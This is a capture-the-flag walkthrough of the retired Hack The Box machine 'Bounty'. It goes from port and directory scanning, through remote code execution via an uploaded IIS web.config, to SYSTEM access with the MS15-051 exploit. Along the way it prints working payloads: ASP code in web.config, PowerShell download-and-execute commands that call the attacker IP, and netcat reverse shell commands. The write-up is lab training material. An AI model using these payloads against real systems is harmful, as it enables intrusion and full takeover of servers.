Hack The Box: Bounty Walkthrough

Hello friends this is p4pentest. As we know that Hack The Box Machine: Bounty is now retired so we can post the walkthrough for this really good challenge. I divided the solution for the machine in below 3 sections:

  • Initial Enumeration
  • Local Shell Access
  • Privilege Escalation

Victim IP Address: 10.10.10.93

Attacker IP Address(p4pentest): 10.10.14.13

Initial Enumeration:

I performed nmap scan for initial enumeration to find open ports, services running on that and Operating System. Hence I ran aggressive scan for default ports:

root@kali:~/Bounty# nmap -A 10.10.10.93 -Pn -n
Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-03 07:52 IST
Nmap scan report for 10.10.10.93
Host is up (0.12s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Bounty
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port

From the above result it was clear that there was only one single port 80 open. Hence I browsed the IP address in browser. And found page as shown below:

We can see from the above image that there is no useful information on this page, so i used gobuster to enumerate directories and files. But before I want to find out if there is any particular backend language the server is using, hence I tried random filename with different extensions of server side language. I found error on aspx page as shown in below image.

It was clear that server was using aspx for server side pages.

Hence I started gobuster with below command to enumerate directories and files:

root@kali:~/Bounty# gobuster -u 10.10.10.93 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .aspx,.html -t 80
=====================================================
Gobuster v2.0.0 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://10.10.10.93/
[+] Threads : 80
[+] Wordlist : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,307,403
[+] Extensions : aspx,html
[+] Timeout : 10s
=====================================================
2018/11/03 09:17:26 Starting gobuster
=====================================================
/transfer.aspx (Status: 200)
/UploadedFiles (Status: 301)
/uploadedFiles (Status: 301)

Local Shell Access

I browsed ‘transfer.aspx’ and found the file upload page.

I tried various method to upload shell but failed showing below error.

I searched on google and found a documentation(blog) for getting RCE by uploading web.config file. I used the code for web.config that was given on that blog. But I was not able to understand the code properly hence modified it to the code as shown below in my web.config file.

<?xml version=”1.0″ encoding=”UTF-8″?>
<configuration>
<system.webServer>
<handlers accessPolicy=”Read, Script, Write”>
<add name=”web_config” path=”*.config” verb=”*” modules=”IsapiModule” scriptProcessor=”%windir%\system32\inetsrv\asp.dll” resource$
</handlers>
<security>
<requestFiltering>
<fileExtensions>
<remove fileExtension=”.config” />
</fileExtensions>
<hiddenSegments>
<remove segment=”web.config” />
</hiddenSegments>
</requestFiltering>
</security>
</system.webServer>
</configuration>
<%Response.write(2+3)
%>

I did this in order to check if the above returns the response as value ‘5’ that is addition of ‘2’ and ‘3’ that i used in web.config file. I successfully uploaded the file and got response as ‘5’

 

File successfully Uploaded without any error this time.

 

Then I browsed the the file uploaded in ‘/uploadedfiles/’ that we found in gobuster search using below link:

http://10.10.10.93/uploadedfiles/web.config

Got response as ‘5’ as shown below:

 

To further confirm if I can perform remote code execution on remote system, I modified  the web.config file as shown below:

<?xml version=”1.0″ encoding=”UTF-8″?>
<configuration>
<system.webServer>
<handlers accessPolicy=”Read, Script, Write”>
<add name=”web_config” path=”*.config” verb=”*” modules=”IsapiModule” scriptProcessor=”%windir%\system32\inetsrv\asp.dll” resourceType=”Unspecified” requireAccess=”Write” preCondition=”bitness64″ />
</handlers>
<security>
<requestFiltering>
<fileExtensions>
<remove fileExtension=”.config” />
</fileExtensions>
<hiddenSegments>
<remove segment=”web.config” />
</hiddenSegments>
</requestFiltering>
</security>
</system.webServer>
</configuration>
<%Response.write(2+3)
Set objShell = CreateObject(“WScript.Shell”)
objShell.Exec(“cmd /c ping 10.10.14.13”)
%>

I uploaded the modified web.config file and started listening on my machine(10.10.14.13) using tcpdump command. Then I browsed the web.config file and got ping request received on my machine tcpdump.

root@kali:~/Bounty# tcpdump -i tun0 icmp
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on tun0, link-type RAW (Raw IP), capture size 262144 bytes
10:38:30.805462 IP 10.10.10.93 > kali: ICMP echo request, id 1, seq 9, length 40
10:38:30.805482 IP kali > 10.10.10.93: ICMP echo reply, id 1, seq 9, length 40
10:38:31.804610 IP 10.10.10.93 > kali: ICMP echo request, id 1, seq 10, length 40
10:38:31.804630 IP kali > 10.10.10.93: ICMP echo reply, id 1, seq 10, length 40
10:38:32.910887 IP 10.10.10.93 > kali: ICMP echo request, id 1, seq 11, length 40
10:38:32.910913 IP kali > 10.10.10.93: ICMP echo reply, id 1, seq 11, length 40
10:38:33.831733 IP 10.10.10.93 > kali: ICMP echo request, id 1, seq 12, length 40
10:38:33.831752 IP kali > 10.10.10.93: ICMP echo reply, id 1, seq 12, length 40

As i understood that we can perform remote code execution. So i downloaded nishang powershell reverse shell ‘Invoke-PowerShellTcp.ps1‘ from link and modified it by adding highlighted line to the end of that file:

catch
{
Write-Warning “Something went wrong! Check if the server is reachable and you are using the correct port.”
Write-Error $_
}
}
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.13 -Port 4450

The above line contains my attacker machine IP Address and port on which I started listening for reverse shell netcat.

root@kali:~/Bounty# nc -lvp 4450
listening on [any] 4450 …

I modified the web.config file as show in below code:

<?xml version=”1.0″ encoding=”UTF-8″?>
<configuration>
<system.webServer>
<handlers accessPolicy=”Read, Script, Write”>
<add name=”web_config” path=”*.config” verb=”*” modules=”IsapiModule” scriptProcessor=”%windir%\system32\inetsrv\asp.dll” resource$
</handlers>
<security>
<requestFiltering>
<fileExtensions>
<remove fileExtension=”.config” />
</fileExtensions>
<hiddenSegments>
<remove segment=”web.config” />
</hiddenSegments>
</requestFiltering>
</security>
</system.webServer>
</configuration>
<%Response.write(2+3)
Set objShell = CreateObject(“WScript.Shell”)
objShell.Exec(“cmd /c powershell IEX(New-Object Net.WebClient).DownloadString(‘http://10.10.14.13/Invoke-PowerShellTcp.ps1’)”)
%>

Then I started python web server on port 80 for which the web.config will try to download execute using below command:

root@kali:~/Bounty# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 …

I uploaded the web.config file and accessed it using below link:

http://10.10.10.93/uploadedfiles/web.config

Got web access log for powershell reverse shell from victim machine:

root@kali:~/Bounty# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 …
10.10.10.93 -- -- [03/Nov/2018 11:35:51] “GET /Invoke-PowerShellTcp.ps1 HTTP/1.1” 200 --

Got access to normal shell:

root@kali:~/Bounty# nc -lvp 4450
listening on [any] 4450 …
10.10.10.93: inverse host lookup failed: Unknown host
connect to [10.10.14.13] from (UNKNOWN) [10.10.10.93] 49174
Windows PowerShell running as user BOUNTY$ on BOUNTY
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\windows\system32\inetsrv>whoami
bounty\merlin
PS C:\windows\system32\inetsrv>

Privilege Escalation

First I ran below command to identify OS name, version and system type:

PS C:\windows\temp> systeminfo | findstr /B /C:”OS Name” /C:”OS Version” /C:”System Type”
OS Name: Microsoft Windows Server 2008 R2 Datacenter
OS Version: 6.1.7600 N/A Build 7600
System Type: x64-based PC

Then I downloaded the Sherlock.ps1 powershell script that is used for finding missing software patches for local privilege escalation vulnerabilities from link and added line ‘Find-AllVulns’ to the end of file to check for all vulnerabilities and hosted on attacker’s machine.

}
Set-ExploitTable $MSBulletin $VulnStatus
}
Find-AllVulns

I ran it on remote victim machine after moving to temp folder using below command:

PS C:\windows\temp> IEX(New-Object Net.WebClient).downloadString(‘http://10.10.14.13/Sherlock.ps1’)

The script found 2 vulnerabilities one was related to ‘Task Scheduler .XML’ and other was related to ‘ClientCopyImage Win32k’:

Title : Task Scheduler .XML
MSBulletin : MS10-092
CVEID : 2010-3338, 2010-3888
Link : https://www.exploit-db.com/exploits/19930/
VulnStatus : Appears Vulnerable
Title : ClientCopyImage Win32k
MSBulletin : MS15-051
CVEID : 2015-1701, 2015-2433
Link : https://www.exploit-db.com/exploits/37367/
VulnStatus : Appears Vulnerable

I tried to go with second vulnerability ‘MS15-051’ and search for the exploit for the same.
Found an exploit on link and downloaded it to my attacker machine working folder. I extracted the folder zip ‘MS15-051-KB3045171.zip’ and copied file ‘ms15-051×64.exe’ from folder ‘ms15-051×64.exe’ to Bounty Folder. I copied 64 bit exe because that installed OS was 64 bit. Also I downloaded 64 bit netcat from link.

Downloaded ms15-051×64.exe and nc64.exe on victim machine using below command:

PS C:\windows\temp> (New-Object System.Net.WebClient).DownloadFile(‘http://10.10.14.13/ms15-051×64.exe’,’c:\windows\temp\ms15-051×64.exe’)
PS C:\windows\temp> (New-Object System.Net.WebClient).DownloadFile(‘http://10.10.14.13/nc64.exe’,’c:\windows\temp\nc64.exe’)
PS C:\windows\temp> dir
Directory: C:\windows\temp
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---- 6/10/2018 3:44 PM vmware-SYSTEM
-a--- 5/30/2018 3:19 AM 0 DMI5FAC.tmp
-a--- 11/3/2018 10:51 AM 55296 ms15-051×64.exe
-a--- 11/3/2018 10:51 AM 43696 nc64.exe
-a--- 6/10/2018 3:44 PM 203777 vminst.log
-a--- 11/3/2018 4:09 AM 57470 vmware-vmsvc.log
-a--- 6/11/2018 12:47 AM 22447 vmware-vmusr.log
-a--- 11/3/2018 4:09 AM 910 vmware-vmvss.log

Started listening on port 4446 and Started python server on attacker machine

Then ran below command to execute the exploit on victim machine normal user shell:

PS C:\windows\temp> ./ms15-051×64.exe “c:\windows\temp\nc64.exe -e cmd 10.10.14.13 4446”

Got reverse shell with system level privileges:

root@kali:~/Bounty# nc -lvp 4446
listening on [any] 4446 …
10.10.10.93: inverse host lookup failed: Unknown host
connect to [10.10.14.13] from (UNKNOWN) [10.10.10.93] 49172
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\windows\temp>whoami
whoami
nt authority\system

One thought on “Hack The Box: Bounty Walkthrough

Leave a Reply

Your email address will not be published. Required fields are marked *